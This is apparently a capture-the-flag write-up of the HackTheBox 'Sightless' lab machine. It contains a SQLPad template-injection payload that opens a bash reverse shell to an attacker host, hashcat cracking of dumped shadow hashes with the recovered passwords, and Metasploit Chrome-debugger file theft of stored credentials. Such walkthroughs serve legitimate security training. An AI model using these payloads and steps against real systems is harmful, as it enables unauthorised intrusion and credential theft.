Sightless
Synopsis
Sightless is a easy linux machine created by EmSec. The nmap discovers the ftp, ssh and http open ports. The web has a sightless.htb domain. The subdomain sqlpad.sightless.htb uses the sqlpad and it is vulnerable to CVE-2022-0944 RCE vulnerability. The exploit gives us the foothold to docker container as root user. The shadow file contains the hash of root and michael user. Cracking the password gives us a shell of michael user via ssh. Pilliaging the michael we discovers that the froxlor is running using port 8080, admin.sightless.htb vhost is present in /etc/hosts file, the user john has enabled the chrome remote debugger and running the administrator.py. Port forwarding and adding the vhost into the /etc/hosts gives us a froxlor login page. The metasploit is used for chrome remote debugger exploit to download the administrator.py file. The file contains the crediantials for froxlor login page. The froxlor has a php-fpm service installed. Enable the service and we can copy the id_rsa of root user by configuring the new php version.
OS
Difficulty
Points
Release Date
Retired Date
Linux
Easy
20
07-09-2024
11-01-2025
Enumeration
Nmap
Started the nmap and found the ftp, ssh and http services running.
nmap -Pn -sC -sV --min-rate=500 10.10.11.32
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-08 02:18 EST
Nmap scan report for 10.10.11.32
Host is up (0.88s latency).
Not shown: 964 filtered tcp ports (no-response), 33 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
21/tcp open ftp
| fingerprint-strings:
| GenericLines:
|_ 220 ProFTPD Server (sightless.htb FTP Server) [::ffff:10.10.11.32]
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 c9:6e:3b:8f:c6:03:29:05:e5:a0:ca:00:90:c9:5c:52 (ECDSA)
|_ 256 9b:de:3a:27:77:3b:1b:e1:19:5f:16:11:be:70:e0:56 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://sightless.htb/
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port21-TCP:V=7.94SVN%I=7%D=1/8%Time=677E26F3%P=x86_64-pc-linux-gnu%r(Ge
SF:nericLines,44,"220\x20ProFTPD\x20Server\x20\(sightless\.htb\x20FTP\x20S
SF:erver\)\x20\[::ffff:10\.10\.11\.32\]\r\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 111.49 secondsAdd the sightless.htb in /etc/hosts file.
Web - sightless.htb
The website is hosted for giving the services for handling the IT infrastructure. The sqlpad and froxlor is used for handling databases and servers services.
The start now button in service section of sqlpad redirects us to sqlpad.sightless.htb subdomain and the froxlor redirects to froxlor main page.
Add the sqlpad.sightless.htb in /etc/hosts file.
Web - sqlpad.sightless.htb
SQLPad is a web application designed to help users write, run and visualize SQL queries. It supports a variety of databases including Postgres, MySQL, SQL Server, and others via ODBC.
Foothold
Searching the vulnerability for sqlpad in web leads me to CVE-2022-0944 RCE vulnerability. The PoC blog post of these vulnerability is published in huntr.
Shell - Docker Container [root]
Add New Connection and choose MySQL Driver. In database section add the below payload.
{{ process.mainModule.require('child_process').exec('/bin/bash -c \"bash -i >& /dev/tcp/{IP}/{PORT} 0>&1\"') }}
Start the nc listener in your local machine and click on test.
nc -lvnp 8443
Listening on 0.0.0.0 8443
Connection received on 10.10.11.32 48796
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
root@c184118df0a6:/var/lib/sqlpad#Pivoting
Shell - Docker Container [root] -> michael
The shadow file in docker container gives us the password hash for michael and it can be used for pivoting to system as a michael.
root@c184118df0a6:/var/lib/sqlpad# cat /etc/shadow
cat /etc/shadow
root:$6$jn8fwk6LVJ9IYw30$qwtrfWTITUro8fEJbReUc7nXyx2wwJsnYdZYm9nMQDHP8SYm33uisO9gZ20LGaepC3ch6Bb2z/lEpBM90Ra4b.:19858:0:99999:7:::
daemon:*:19051:0:99999:7:::
bin:*:19051:0:99999:7:::
sys:*:19051:0:99999:7:::
sync:*:19051:0:99999:7:::
games:*:19051:0:99999:7:::
man:*:19051:0:99999:7:::
lp:*:19051:0:99999:7:::
mail:*:19051:0:99999:7:::
news:*:19051:0:99999:7:::
uucp:*:19051:0:99999:7:::
proxy:*:19051:0:99999:7:::
www-data:*:19051:0:99999:7:::
backup:*:19051:0:99999:7:::
list:*:19051:0:99999:7:::
irc:*:19051:0:99999:7:::
gnats:*:19051:0:99999:7:::
nobody:*:19051:0:99999:7:::
_apt:*:19051:0:99999:7:::
node:!:19053:0:99999:7:::
michael:$6$mG3Cp2VPGY.FDE8u$KVWVIHzqTzhOSYkzJIpFc2EsgmqvPa.q2Z9bLUU6tlBWaEwuxCDEP9UFHIXNUcF2rBnsaFYuJa6DUh/pL2IJD/:19860:0:99999:7:::Create the file., copy and paste both the hashes into the file. Crack the hash using hashcat.
hashcat -a 0 hash /usr/share/wordlists/rockyou.txthashcat --show hash
Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:
1800 | sha512crypt $6$, SHA512 (Unix) | Operating System
NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!
Do NOT report auto-detect issues unless you are certain of the hash type.
$6$jn8fwk6LVJ9IYw30$qwtrfWTITUro8fEJbReUc7nXyx2wwJsnYdZYm9nMQDHP8SYm33uisO9gZ20LGaepC3ch6Bb2z/lEpBM90Ra4b.:blindside
$6$mG3Cp2VPGY.FDE8u$KVWVIHzqTzhOSYkzJIpFc2EsgmqvPa.q2Z9bLUU6tlBWaEwuxCDEP9UFHIXNUcF2rBnsaFYuJa6DUh/pL2IJD/:insaneclownpossessh michael@10.10.11.32
michael@10.10.11.32's password:
Last login: Tue Sep 3 11:52:02 2024 from 10.10.14.23
michael@sightless:~$ Privilege Escalation
Pillaging - michael [user]
Michael doesn't have the privilage to run the sudo command. The netstat command lists us some of the open ports.
michael@sightless:~$ netstat -tlnp
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:42735 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8080 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:46215 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:45813 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3000 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:33060 0.0.0.0:* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 :::21 :::* LISTEN - The port 8080 is used for hosting froxlor service. Port forward to local machine for further enumeration.
curl http://127.0.0.1:8080<!DOCTYPE html>
<html lang="en" data-bs-theme="light">
<head>
<!-- Required meta tags -->
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<meta name="robots" content="noindex, nofollow, noarchive"/>
<meta name="googlebot" content="nosnippet"/>
<link rel="icon" type="image/x-icon" href="templates/Froxlor/assets/img/icon.png">
<meta name="csrf-token" content="a447207d749fd9ae386af245d62cd982c4660eda" />
<!-- Assets -->
<link rel="stylesheet" href="templates/Froxlor/build/assets/app-61450a15.css">
<script src="templates/Froxlor/build/assets/app-67d6acee.js" type="module"></script>
<title>Froxlor</title>
</head>
<body id="app" class="min-vh-100 d-flex flex-column">
<div class="container-fluid">
<div class="container">
<div class="row justify-content-center">
<form class="col-12 max-w-420 d-flex flex-column" method="post" enctype="application/x-www-form-urlencoded">
<img class="align-self-center my-5" src="templates/Froxlor/assets/img/logo.png" alt="Froxlor Server Management Panel"/>
<div class="card shadow">
<div class="card-body">
<h5 class="card-title">Login</h5>
<p>Please log in to access your account.</p>
<div class="mb-3">
<label for="loginname" class="col-form-label">Username</label>
<input class="form-control" type="text" name="loginname" id="loginname" value="" required autofocus/>
</div>
<div class="mb-3">
<label for="password" class="col-form-label">Password</label>
<input class="form-control" type="password" name="password" id="password" value="" required/>
</div>
</div>
<div class="card-body d-grid gap-2">
<button class="btn btn-primary" type="submit" name="dologin">Login</button>
</div>
<div class="card-footer">
<a class="card-link text-body-secondary" href="index.php?action=forgotpwd">Forgot your password?</a>
</div>
</div>
</form>
</div>
</div>
<footer class="text-center mb-3">
<span>
<img src="templates/Froxlor/assets/img/logo_grey.png" alt="Froxlor"/>
© 2009-2025 by <a href="https://www.froxlor.org/" rel="external" target="_blank">the froxlor team</a><br>
</span>
</footer>
</div>
</body>
</html>ssh -L 8080:localhost:8080 michael@10.10.11.32
The /etc/hosts file has a admin.sightless.htb vhost for froxlor site. Add the admin.sightless.htb in your /etc/hosts file.
127.0.0.1 localhost admin.sightless.htb
The ps aux command reveals that the user john has a chrome remote debugger activated which can be used to find the credentials for above login.
ps aux | grep chrome
john 3704 0.3 0.3 33630172 15432 ? Sl 15:19 0:01 /home/john/automation/chromedriver --port=57135
john 3709 0.0 0.0 0 0 ? Z 15:19 0:00 [chromedriver] <defunct>
john 3711 0.5 2.9 34019516 115608 ? Sl 15:19 0:02 /opt/google/chrome/chrome --allow-pre-commit-input --disable-background-networking --disable-client-side-phishing-detection --disable-default-apps --disable-dev-shm-usage --disable-hang-monitor --disable-popup-blocking --disable-prompt-on-repost --disable-sync --enable-automation --enable-logging --headless --log-level=0 --no-first-run --no-sandbox --no-service-autorun --password-store=basic --remote-debugging-port=0 --test-type=webdriver --use-mock-keychain --user-data-dir=/tmp/.org.chromium.Chromium.WWQhV3 data:,
john 3717 0.0 0.0 33575860 1652 ? Sl 15:19 0:00 /opt/google/chrome/chrome_crashpad_handler --monitor-self-annotation=ptype=crashpad-handler --database=/tmp/Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=lsb-release=Ubuntu 22.04.4 LTS --annotation=plat=Linux --annotation=prod=Chrome_Headless --annotation=ver=125.0.6422.60 --initial-client-fd=6 --shared-client-connection
john 3721 0.0 1.4 34112456 56964 ? S 15:19 0:00 /opt/google/chrome/chrome --type=zygote --no-zygote-sandbox --no-sandbox --enable-logging --headless --log-level=0 --headless --crashpad-handler-pid=3717 --enable-crash-reporter
john 3722 0.0 1.4 34112452 57500 ? S 15:19 0:00 /opt/google/chrome/chrome --type=zygote --no-sandbox --enable-logging --headless --log-level=0 --headless --crashpad-handler-pid=3717 --enable-crash-reporter
john 3739 0.3 3.0 34362352 122200 ? Sl 15:19 0:01 /opt/google/chrome/chrome --type=gpu-process --no-sandbox --disable-dev-shm-usage --headless --ozone-platform=headless --use-angle=swiftshader-webgl --headless --crashpad-handler-pid=3717 --gpu-preferences=WAAAAAAAAAAgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --shared-files --field-trial-handle=3,i,1381930
john 3740 0.1 2.1 33900068 87300 ? Sl 15:19 0:00 /opt/google/chrome/chrome --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --disable-dev-shm-usage --use-angle=swiftshader-webgl --use-gl=angle --headless --crashpad-handler-pid=3717 --shared-files=v8_context_snapshot_data:100 --field-trial-handle=3,i,13819301115298270099,15471180059159053128,262144 --disable-features=PaintHolding --variations-seed-version --enable-logging --log-level=0 --enable-crash-reporter
john 3769 2.4 5.5 1186791276 218300 ? Sl 15:19 0:09 /opt/google/chrome/chrome --type=renderer --headless --crashpad-handler-pid=3717 --no-sandbox --disable-dev-shm-usage --enable-automation --remote-debugging-port=0 --test-type=webdriver --allow-pre-commit-input --ozone-platform=headless --disable-gpu-compositing --lang=en-US --num-raster-threads=1 --renderer-client-id=5 --time-ticks-at-unix-epoch=-1736345423887471 --launch-time-ticks=4118668471 --s
michael 4105 0.0 0.0 6612 2236 pts/3 S+ 15:25 0:00 grep --color=auto chromeThe user john is also running the below command.
/usr/bin/python3 /home/john/automation/administration.pyExploit - Chrome Remote Dubugger [Metasploit]
The exploit for chrome remote debugger is available in metasploit. I will be using it to download the administration.py file for getting the froxlor dashboard credentials.
Port Forward all the larger number ports.
Run the
metasploitwhile adding all the ports until the administration.py file is downloaded
sudo msfdb run
[msf](Jobs:0 Agents:0) >> search debugger
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/gather/chrome_debugger 2019-09-24 normal No Chrome Debugger Arbitrary File Read / Arbitrary Web Request
1 exploit/multi/misc/java_jdwp_debugger 2010-03-12 good Yes Java Debug Wire Protocol Remote Code Execution
2 \_ target: Linux (Native Payload) . . . .
3 \_ target: OSX (Native Payload) . . . .
4 \_ target: Windows (Native Payload) . . . .
5 exploit/linux/ssh/mercurial_ssh_exec 2017-04-18 excellent No Mercurial Custom hg-ssh Wrapper Remote Code Exec
6 exploit/multi/misc/nodejs_v8_debugger 2016-08-15 excellent Yes NodeJS Debugger Command Injection
7 exploit/multi/http/werkzeug_debug_rce 2015-06-28 excellent Yes Werkzeug Debug Shell Command Execution
Interact with a module by name or index. For example info 7, use 7 or use exploit/multi/http/werkzeug_debug_rce
[msf](Jobs:0 Agents:0) >> use 0
[msf](Jobs:0 Agents:0) auxiliary(gather/chrome_debugger) >> info
Name: Chrome Debugger Arbitrary File Read / Arbitrary Web Request
Module: auxiliary/gather/chrome_debugger
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2019-09-24
Provided by:
Adam Baldwin (Evilpacket)
Nicholas Starke (The King Pig Demon)
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FILEPATH no File to fetch from remote machine.
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 9222 yes The target port (TCP)
TIMEOUT 10 yes Time to wait for response
URL no Url to fetch from remote machine.
Description:
This module uses the Chrome Debugger's API to read
files off the remote file system, or to make web requests
from a remote machine. Useful for cloud metadata endpoints!
View the full module info with the info -d command.
[msf](Jobs:0 Agents:0) auxiliary(gather/chrome_debugger) >> set RHOSTS localhost
RHOSTS => localhost
[msf](Jobs:0 Agents:0) auxiliary(gather/chrome_debugger) >> set RPORT 41429
RPORT => 41429
[msf](Jobs:0 Agents:0) auxiliary(gather/chrome_debugger) >> exploit -j
[*] Running module against 127.0.0.1
[*] Attempting Connection to ws://127.0.0.1:41429/devtools/page/B76FEFCB8EAE8305BE4A0ABD159F297D
[*] Opened connection
[*] Attempting to load url file:///home/john/automation/administration.py
[*] Received Data
[*] Sending request for data
[*] Received Data
[+] Stored file:///home/john/automation/administration.py at /root/.msf4/loot/20250108101826_default_127.0.0.1_chrome.debugger._522145.txt
[*] Running module against ::1
[-] Bad Response
[*] Auxiliary module execution completed
[msf](Jobs:0 Agents:0) auxiliary(gather/chrome_debugger) >> sudo cat /root/.msf4/loot/20250108101826_default_127.0.0.1_chrome.debugger._522145.txt<html><head><meta name="color-scheme" content="light dark"></head><body><pre style="word-wrap: break-word; white-space: pre-wrap;">#!/usr/bin/python3
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.chrome.service import Service
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.common.exceptions import UnexpectedAlertPresentException
from selenium.common.exceptions import NoAlertPresentException
from selenium.webdriver.common.alert import Alert
from selenium.webdriver.support import expected_conditions as EC
import time
import threading
import schedule
options = Options()
options.add_argument('--headless')
options.add_argument('--no-sandbox')
options.add_argument('--disable-dev-shm-usage')
# Update this line with the path to your locally downloaded Chrome driver
chrome_driver_path = '/home/john/automation/chromedriver'
# Use Service to specify the Chrome driver binary path
service = Service(chrome_driver_path)
service.start()
driver = webdriver.Chrome(service=service, options=options)
def dismiss_all_alerts(driver):
while True:
try:
alert = driver.switch_to.alert
print(f"Dismissed alert with text: {alert.text}")
alert.accept()
time.sleep(1)
except NoAlertPresentException:
break
print("browser opened")
while True:
try:
driver.get("http://admin.sightless.htb:8080/admin_logger.php?page=log")
time.sleep(7)
# Username Field
input_element = driver.find_element(By.ID, "loginname")
input_element.send_keys("admin")
# Password field
input_element = driver.find_element(By.ID, "password")
input_element.send_keys("ForlorfroxAdmin" + Keys.ENTER)
print("Logged In...")
except UnexpectedAlertPresentException:
input_element.send_keys(Keys.ENTER)
pass
time.sleep(5)
dismiss_all_alerts(driver)
driver.get("http://admin.sightless.htb:8080/admin_index.php?action=logout")
driver.get("http://admin.sightless.htb:8080/")
print("Logged Out")
time.sleep(3)
#driver.close()
</pre></body></html># The credentials for froxlor dashboard is admin:ForlorfroxAdmin
Shell - root
The php-fpm can be used for getting shell as root or reading the root.txt file.
Enable the php-fpm: System > Settings > PHP-FPM
Copy the root id_rsa file or root.txt.
Change directory into /tmp and
catid_rsa
michael@sightless:~$ cd /tmp
michael@sightless:/tmp$ cat id_rsaCopy the id_rsa and save it into your local machine. Change the permission and
sshinto root.
chmod 600 id_rsa
​
ssh -i id_rsa root@10.10.11.32
Last login: Tue Sep 3 08:18:45 2024
root@sightless:~#
Last updated